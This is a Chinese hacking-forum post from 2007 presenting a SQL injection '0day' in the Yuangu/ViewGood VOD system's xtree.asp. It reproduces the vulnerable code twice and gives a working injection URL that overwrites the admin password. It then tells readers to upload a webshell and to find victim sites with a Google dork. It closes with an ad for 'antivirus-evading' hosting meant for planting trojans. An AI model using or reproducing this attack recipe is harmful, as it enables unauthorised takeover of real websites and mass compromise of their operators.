远古VOD漏洞　（0day)

政政

寂寞中的活跃者

管理员-庶民之子

Rank: 9 Rank: 9 Rank: 9

最高执行者

帖子: 698
威望: 0 点
T币: 39 个
警告: 0 次
活力: 393 点
性别: 男
来自: 北京
在线时间: 568 小时
注册时间: 2007-9-19
最后登录: 2008-11-20

论坛管理员勋章

发短消息
加为好友
当前离线

1^# 大中小发表于 2007-11-7 00:27 只看该作者

远古VOD漏洞　（0day)

四月份的漏洞曾经在群里见过寒水利用这个洞拿电影站的权限

漏洞文件webmedia/common/function/xtree.asp

〈!--#include file="../dbcon.inc.asp" -->
〈%
iNode_ID = Request.QueryString("id")

if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session("VODAdmin")) > 0 then
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" & iNode_ID
else
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" & iNode_ID
end if
rsData.Open szSQL,con,1,3
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
szRetVar = szRetVar & "<TypeInfo>"
szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"
szRetVar = szRetVar & "</TypeInfo>"
rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close

Response.CharSet = "GB2312"
Response.ContentType = "text/xml"
Response.Expires = -1

Response.Write szRetVar
%>
〈!--#include file="../dbend.inc.asp" -->

〈!--#include file="../dbcon.inc.asp" -->
〈%
iNode_ID = Request.QueryString("id")

if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session("VODAdmin")) > 0 then
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" & iNode_ID
else
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" & iNode_ID
end if
rsData.Open szSQL,con,1,3
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
szRetVar = szRetVar & "<TypeInfo>"
szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"
szRetVar = szRetVar & "</TypeInfo>"
rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close

Response.CharSet = "GB2312"
Response.ContentType = "text/xml"
Response.Expires = -1

Response.Write szRetVar
%>
〈!--#include file="../dbend.inc.asp" -->

很容易看出以上存在着DB权限注入

注射地址：[url=http://wwww.xxxxx.com/webmedia/common/function/xtree.asp?id=1]http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1[/url]

表段名：customer

构造函数把admin的pass改成fuck
http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='633f94d350db34d5'%20where%20UserName='admin'

登陆后台直接上传大马完事！

测试方法：在google搜: inurL:webmedia/ 随便找个站都可以入侵

官方地址：http://www.viewgood.com/

最新推出黑客免杀空间15元/月，支持ASP收信、挂马、上线等. 点击申请

TOP

‹‹ 上一主题 | 下一主题 ››

远古VOD漏洞 （0day)

远古VOD漏洞 （0day)

远古VOD漏洞　（0day)

远古VOD漏洞　（0day)